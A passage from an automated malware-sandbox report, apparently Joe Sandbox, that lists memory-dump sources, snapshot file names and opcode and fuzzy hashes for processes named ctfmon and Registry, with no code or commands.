                  • Opcode Fuzzy Hash: 60c9ccd575721fe7ce1a04f1233960a6968d81f072c35c875216c52d5b5fc447
                  • Instruction Fuzzy Hash: 39016930819A0E9EEB49EBB494586F9B7A0FF18345F60087FE81EC21D5DF36A594C714
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6eb8a18bdaddba3ea0c11ba2d346a791cc7251c7be11ce4be587e0aeab8284eb
                  • Instruction ID: 70fbe0b85560b5d9cbc7f70966701ef1c08c9be0c3c5ae1ae583ea9d4ab2e6bf
                  • Opcode Fuzzy Hash: 6eb8a18bdaddba3ea0c11ba2d346a791cc7251c7be11ce4be587e0aeab8284eb
                  • Instruction Fuzzy Hash: C2F03030A094198FEB50EB58D980BEE77F1EB94345F104265C409E3285CF3AAE848F88
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction ID: bebe179727837605b8858fdd165e8be2353e30b1bf0d680e933d662a0be8a0b6
                  • Opcode Fuzzy Hash: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction Fuzzy Hash: 97E0C9B0D1C91ECEDBA4EB049940BA8B6B1BF54344F2040F9820DE21D0DB392AC18F08
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction ID: 9e68356b72711295f76f4b4a92f364bf6f4393a4e4aca72441659c55d787ff4a
                  • Opcode Fuzzy Hash: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction Fuzzy Hash: 59E04CB0D1C91D8EDBA4EB049850BA8B7B1FF54354F1045F9820DE3280DB356AC19F08
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: Z_H
                  • API String ID: 0-256909865
                  • Opcode ID: 885635410e46377ce21d007dda7c9ab63d69c1d72bd42830d9086ad3d9d043b6
                  • Instruction ID: d3e9f89deb728e1078b05ca16dbd5bd698c9fa779b950acf7d654d51bbc65d45
                  • Opcode Fuzzy Hash: 885635410e46377ce21d007dda7c9ab63d69c1d72bd42830d9086ad3d9d043b6
                  • Instruction Fuzzy Hash: EA91BD71D1D94A9FEB48EB2CD8697A9BFE1FB8A350F5040BAC009C72C6DB781845CB51
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 49eaa3b9891decd1b378f43e18f7463df82f2550f09730c24ec862119f2cfb26
                  • Instruction ID: 07bd2c44628d8d14ca2d3bb28e9ed0ddd9b7207b6f382a4166c7c78906552ebe
                  • Opcode Fuzzy Hash: 49eaa3b9891decd1b378f43e18f7463df82f2550f09730c24ec862119f2cfb26
                  • Instruction Fuzzy Hash: 6B62A030C0E68A9FEB56EF3488292F97FE1FF66351F0505BAD808C61D2DB286944C756
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e2b90f5283254efedb42b79099098530d19e718cfdd4826e992814b59cefdc25
                  • Instruction ID: e683740081dfa48e1259b8ba84266c6ed5301eac7ab0367e9c6185c982d8e206
                  • Opcode Fuzzy Hash: e2b90f5283254efedb42b79099098530d19e718cfdd4826e992814b59cefdc25
                  • Instruction Fuzzy Hash: 9152DF30D0D68A8FEB89EF2888692B97BE1FF69341F0505BAD409C71D2DB38A944C755
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b79c49fb281db7dc1042eea72d4294b603681f662dc4256456c8bc9622e70501
                  • Instruction ID: 3396320c39ac9f875e8e94ba2c24d51164efac15606470db526c18ff8dbb36fc
                  • Opcode Fuzzy Hash: b79c49fb281db7dc1042eea72d4294b603681f662dc4256456c8bc9622e70501
                  • Instruction Fuzzy Hash: 8B429230C0E68A9FEB99EF3488292F97BE1FF65351F0505BAD808C61D2DB386944C756
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe147201f49585378424ac92934fc0b8236c0ea3801128fb692b590d87de4e03
                  • Instruction ID: 8c877d5657f23cb59e04e649e5e139d6a41a8aa48f583e3ef50f61756be808a9
                  • Opcode Fuzzy Hash: fe147201f49585378424ac92934fc0b8236c0ea3801128fb692b590d87de4e03
                  • Instruction Fuzzy Hash: 4522BD3080D68E9FEB95EF2488696BABBF1FF59341F0404BAD409C71D2EB38A944C755
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: caf60c0d5bf83483fd53e7ad2a0818e1f9b9a7c8ce9324881114899b96a08699
                  • Instruction ID: c28fd2085a53c8ba832d6d5025e04963c53c763a925026c7eda247e2d32a3dbf
                  • Opcode Fuzzy Hash: caf60c0d5bf83483fd53e7ad2a0818e1f9b9a7c8ce9324881114899b96a08699
                  • Instruction Fuzzy Hash: 22E18D30D0D68E8FEB99EB2488596BABBB1FF19341F0445BAD409C71D2DF386984CB45
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9b65cc19ec64d2c45580e90b54bbd4688608e11a252489078ed597573d6a63d
                  • Instruction ID: d0593563b627b8c0e3bb7330b0502531b21d965956b7020a57e95b1f22aa5722
                  • Opcode Fuzzy Hash: d9b65cc19ec64d2c45580e90b54bbd4688608e11a252489078ed597573d6a63d
                  • Instruction Fuzzy Hash: B1D1893090D68A8FEB45EFA488A96F97BE0FF19340F0545BAE409C71D2DB38A944CB55
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6057708656048780fef3adb545bd94f511b7326fdf61f7ce3edc0c40cc4507f
                  • Instruction ID: e7fc4daa8c636fcfcb5c8f0945f9d9b666986e7ccbaf3d2b9903c01008bd0ea4
                  • Opcode Fuzzy Hash: b6057708656048780fef3adb545bd94f511b7326fdf61f7ce3edc0c40cc4507f
                  • Instruction Fuzzy Hash: 8DA1C03080D68A9FEB9AEF28C8692B97BB0FF5A341F0501BED409C71D2DB396944C755
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: {O_^
                  • API String ID: 0-1464602388
                  • Opcode ID: ac7d124b86a859a3893b388e52ea006a86e6446cb3c31df61f45c200ed2344ff
                  • Instruction ID: b6b17153a1a6add77c5f5f343dd1830e718e75084305508b0aecd3a04521d99a
                  • Opcode Fuzzy Hash: ac7d124b86a859a3893b388e52ea006a86e6446cb3c31df61f45c200ed2344ff
                  • Instruction Fuzzy Hash: 9241B03690E25ADEE755BBACA8551FA7B60EF527B9F040237D50CC90C3FB2C244582A9
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b09bc1349d58ff6513e62e489098b0c1c4dd845d4d7dc512269d0defa0f8a2f3
                  • Instruction ID: b0dd5f9c06c0f273957cf239e9c711ef10941bd4750a052e2c8516037e154b4a
                  • Opcode Fuzzy Hash: b09bc1349d58ff6513e62e489098b0c1c4dd845d4d7dc512269d0defa0f8a2f3
                  • Instruction Fuzzy Hash: F2129330C0E68A9FEB99EF3488192F97BE1FF65351F0505BAD808C61D2EB386944C756
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1d8bafe8f14c19a2c084a72d25d56e23b9313f3e98aa4d5f287f3f4cb270f7a
                  • Instruction ID: 5d8b83d1fb6a203df0b2fb853052141c69a5d3c3cba62f566b7a47b2ce4bcbba
                  • Opcode Fuzzy Hash: e1d8bafe8f14c19a2c084a72d25d56e23b9313f3e98aa4d5f287f3f4cb270f7a
                  • Instruction Fuzzy Hash: 8E61807180E6C59FE752A77888595A9BFF0FF16351F0904FBC088CB0D3DA28A948C366
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58ec6f227e552bc04c55f87c7f7f7765f94e94b59d9cf8dea303a907416aaae8
                  • Instruction ID: c16ab514a503a59b6550979de968fdd6f89f87a8bfcacb86ea67bc0d0e5b3b02
                  • Opcode Fuzzy Hash: 58ec6f227e552bc04c55f87c7f7f7765f94e94b59d9cf8dea303a907416aaae8
                  • Instruction Fuzzy Hash: BC12A330C0E68E9FEB99EF3488192F97BE1FF65351F0505BAD408C61D2EB286944C756
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1ee897269d3e3516225e91ec32dd165c6e55ff6af416774ed80ff37fe7fb5368
                  • Instruction ID: 030a2aa7ffb20372d2ef65668a9cfdef438f135701acad49e2b158f254fae13c
                  • Opcode Fuzzy Hash: 1ee897269d3e3516225e91ec32dd165c6e55ff6af416774ed80ff37fe7fb5368
                  • Instruction Fuzzy Hash: 3802A430C0E68E9FEB95EF3488192F97BE1FF65351F0505BAD408C61D2EB286944C756
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1ff4f0251ca1bec4690feaeb35dbefc06e3ba57ce231fdc9669afff47223df13
                  • Instruction ID: e88d47a246eaea4dc9c5f4e611151397c9db994c31912a8fbd7e145ac56b2c8a
                  • Opcode Fuzzy Hash: 1ff4f0251ca1bec4690feaeb35dbefc06e3ba57ce231fdc9669afff47223df13
                  • Instruction Fuzzy Hash: EC31B122C0E6D19EE752B73C58661E97FB0FF42655F0904FBC0C8CA0D3EA1C6848836A
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f6eac33e1a30b56c67022d366b493146e1f3de00782faf5b93005ca33c01621
                  • Instruction ID: 3a6ce34c753f8b9caa75747bbfc9fae6a554e446eeb486660863df123362858f
                  • Opcode Fuzzy Hash: 3f6eac33e1a30b56c67022d366b493146e1f3de00782faf5b93005ca33c01621
                  • Instruction Fuzzy Hash: 9B719E3084DA8A8FD746EB3488696FA7BE0EF1A341F1504FBD409C70E6EB39A945C751
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c25f5d01f97913842c9cd40bf0b97aaecae9c5763d77500863f7f1aad4b4eb22
                  • Instruction ID: 568e5c79c28e6ef303f1b2ec626616b8011e08da6d77e1411b79508c8291e917
                  • Opcode Fuzzy Hash: c25f5d01f97913842c9cd40bf0b97aaecae9c5763d77500863f7f1aad4b4eb22
                  • Instruction Fuzzy Hash: B811517180E7C59FE752A77848591A97FB0EF12355F0904FBC088DA5D3EA2D6908C356
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b2f1629ec2557e6de4df1005868572e9805467b7f1b736cd2924af22a7a8923c
                  • Instruction ID: 19ed88cc58eb741158c405bf5d51c656d7455af6eb2e4e820b070e79cb10d064
                  • Opcode Fuzzy Hash: b2f1629ec2557e6de4df1005868572e9805467b7f1b736cd2924af22a7a8923c
                  • Instruction Fuzzy Hash: 97D14971D19A5A8FEB98EB68D4947B8B7B1FF59340F0441BAD00DE32D2DB386880CB55
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f5d8b4a1498f089037a624d469624f494f490ee71e5d21f1f3d264147285cba6
                  • Instruction ID: 134c78a92744ab8150138c651d67be3b3f0880b0a609f2dc564979f372037546
                  • Opcode Fuzzy Hash: f5d8b4a1498f089037a624d469624f494f490ee71e5d21f1f3d264147285cba6
                  • Instruction Fuzzy Hash: 38C12470D0C61A9EEB95EB68C8597E9BBF1FF58341F0041BAD04DE3292DB386984CB15
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8eaf97fc25a786065a17ae5e652055ee6db0854de82219dc46904fe7be0a99d9
                  • Instruction ID: 89317a2a3a95485a46537dc245c46eb2f8f465d58efb8fc643cefe6255d840ae
                  • Opcode Fuzzy Hash: 8eaf97fc25a786065a17ae5e652055ee6db0854de82219dc46904fe7be0a99d9
                  • Instruction Fuzzy Hash: B7A19D3084DA8A9FEB92FB7488595B97BF0FF19340F0545BAD40CC70A6EB38A944CB15
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6824697c38ee91a498e25952a3334083dc679146bbefe5e5bd723efed12a4dc
                  • Instruction ID: dd3aded0c40c97a98387ed042f2bc32daecefce9914e2f6233a69add4965446f
                  • Opcode Fuzzy Hash: b6824697c38ee91a498e25952a3334083dc679146bbefe5e5bd723efed12a4dc
                  • Instruction Fuzzy Hash: B4A1AE3090DA8E8FEB45EB28C8586F97BE0FF19341F1504BAD409C71D6EB78A984CB15
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e6b8fe9099fd62f2db75893a40cbf77a6f4244609eb29333d12afda709d64292
                  • Instruction ID: 0f51ffb96b85c09f23da4442425e2f4932964165999a97efac4272fcf2316131
                  • Opcode Fuzzy Hash: e6b8fe9099fd62f2db75893a40cbf77a6f4244609eb29333d12afda709d64292
                  • Instruction Fuzzy Hash: 80719B31A0CA4A8FDB49EF1C88516A977E2FF9A744F14457AE44EC32C6DF34A842C785
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 959687b25510db0b5c9916f551f67f3a37a4c3d8e55cdabf516e21967cf02a46
                  • Instruction ID: a3758d82a460ed1b65c5e24796d6fdb48f85853003478bc0797f901112093728
                  • Opcode Fuzzy Hash: 959687b25510db0b5c9916f551f67f3a37a4c3d8e55cdabf516e21967cf02a46
                  • Instruction Fuzzy Hash: DA91573090C69E8FEB95FB2488596BA7BF1FF59341F0405BAD809C7192DB38A944CB45
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3c1b4a97c389abca2395a33ffb15d9ebe10099fbc43eca5ae410447060cbf4be
                  • Instruction ID: 025e83fbd77db7cd071975a53791d3aa3d2245c984fdf3afb03fc1c49b45c336
                  • Opcode Fuzzy Hash: 3c1b4a97c389abca2395a33ffb15d9ebe10099fbc43eca5ae410447060cbf4be
                  • Instruction Fuzzy Hash: 0D81F870D0955E8EEBA4EBA8C8487EDBBF1FF59341F1041BAD00DE7291EB3469848B54
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4e7dc0b9be5c8c963d500546ac43862f7b79540a53b74d7852b08b49707838e2
                  • Instruction ID: f0341b09121d8d143d32ebd696e7c4fe37400e54633e45fb618f67321bee59c0
                  • Opcode Fuzzy Hash: 4e7dc0b9be5c8c963d500546ac43862f7b79540a53b74d7852b08b49707838e2
                  • Instruction Fuzzy Hash: 5D716D30D1D68A8FEB55EFA488592FA7BE0FF19340F05457AE809C21D2EB38A954CB45
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1f70680785aa3c70eb1e1390eba2ebbfa0f026d35fe0784a397695031b01538
                  • Instruction ID: c8e18768f38241eced1294f3bca4113778f8ec5d77ca529a8301709049f970b9
                  • Opcode Fuzzy Hash: e1f70680785aa3c70eb1e1390eba2ebbfa0f026d35fe0784a397695031b01538
                  • Instruction Fuzzy Hash: 6851D12691E566DEE7417BACB4451FA7B60EF423B8F180277D1888D0D3EF1C248682AC
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 998aa0e68b4947a648c56b93f9f10c1588509bf014a13b6cdc461e61f2a120ec
                  • Instruction ID: d6578055f8f3aa089a8de46d06fdeafe296b13b58190823f85ad60e3db731e5e
                  • Opcode Fuzzy Hash: 998aa0e68b4947a648c56b93f9f10c1588509bf014a13b6cdc461e61f2a120ec
                  • Instruction Fuzzy Hash: 26718730D0DA4A8FEB54EB64C8586ADBBB1FF59340F10017AD40DE72C6DB38A9848B85
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0456b1bd35f1d6af7fea173ff94f3c318900de317d991325290db19d22a81eaf
                  • Instruction ID: ed62aef4ad4c7a5ab62e0fe0edac8cf3f85e4a61f09c8ebce16d2a256b732530
                  • Opcode Fuzzy Hash: 0456b1bd35f1d6af7fea173ff94f3c318900de317d991325290db19d22a81eaf
                  • Instruction Fuzzy Hash: F381A470E1A51D8FEBA4EBA8C8957ADB7B1FF59340F1041A9D40DE3292EF3469848F44
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a0f9a9cbab86cdd4bde0f94fccbc79a8864cbdfdce5bc10e882547c4b26c370b
                  • Instruction ID: 6cba0e4ad7818faaae525a895fa5ea412836d0ba032e78177c63f06cc5de76a8
                  • Opcode Fuzzy Hash: a0f9a9cbab86cdd4bde0f94fccbc79a8864cbdfdce5bc10e882547c4b26c370b
                  • Instruction Fuzzy Hash: 6061C230D0E6CA9FEB56AF3488292B97FE1FF65341F0504BAD408C60D2EB289944C746
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bd342a6a73afc9944c8b9d83dfc8051baeadfb9404e732328461d8d10fbe77f6
                  • Instruction ID: 6e63db10641d672194e15f23c58a713e8722c5084d8630a5bcb9b1933e775fbc
                  • Opcode Fuzzy Hash: bd342a6a73afc9944c8b9d83dfc8051baeadfb9404e732328461d8d10fbe77f6
                  • Instruction Fuzzy Hash: 7951CF31A0CA5A8FDB48EF1888555BA77E2FF99740F10457EE44AC32C1DF34A842C785
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bdbebd22f9824fa740bcd8574cfb18b71dcd240d6d985a2168a848cffce6e07a
                  • Instruction ID: 6dcacdcc5d78814bd8710507575abd5b336b842a14f0390a2209d3fdb59483f4
                  • Opcode Fuzzy Hash: bdbebd22f9824fa740bcd8574cfb18b71dcd240d6d985a2168a848cffce6e07a
                  • Instruction Fuzzy Hash: 33516B3091D68A8FEB55EFA4C8552FE7BE0FF19340F01457AE809C21C2EB38A954CB85
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 84f676261d8c8401205cba9a2820ab14f2f3122f045524624a7bd8215e71c2c9
                  • Instruction ID: 7ed41e9945a84697c7949886ef05e2b38f1db2fefc595c4811271f47d24ae568
                  • Opcode Fuzzy Hash: 84f676261d8c8401205cba9a2820ab14f2f3122f045524624a7bd8215e71c2c9
                  • Instruction Fuzzy Hash: 7361E970E1995D9FDB98EB58D8A47B8B7B1FF59340F0441BAD00DE7296DB386880CB05
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e70136576beab49f12090e41653037d01ff60429e5fbd24081c9de3953949be7
                  • Instruction ID: 51c34dca558597ad85f596524a6a1719719765948d7a90ee93bb9e2b04fa6ec0
                  • Opcode Fuzzy Hash: e70136576beab49f12090e41653037d01ff60429e5fbd24081c9de3953949be7
                  • Instruction Fuzzy Hash: DE515A3091D79E8FEB95EF2488192FA7BF0FF56341F0505BAD808C7192EB38A9548785
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 265be492f04b582b79af1a725c76dbbdb5d6118c59c151b0ed06ef8806d5d041
                  • Instruction ID: 3a7c0d1f1367016c17e946fe32e135450779dc7d10a2463858f9dd26ed78311a
                  • Opcode Fuzzy Hash: 265be492f04b582b79af1a725c76dbbdb5d6118c59c151b0ed06ef8806d5d041
                  • Instruction Fuzzy Hash: 4F613B70D0D65A8FEBA5AB6488597B9BAB0FF05340F0445BAD40DD22D2DF3C6D84CB46
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a349e708f1bedde74e19b2d94b3feb308310214954253ba1b58ef1987c361ee
                  • Instruction ID: 42541540b713a4a9ed9f2145959ba15a0f25670f08649f34cd2c64cc250cfa23
                  • Opcode Fuzzy Hash: 8a349e708f1bedde74e19b2d94b3feb308310214954253ba1b58ef1987c361ee
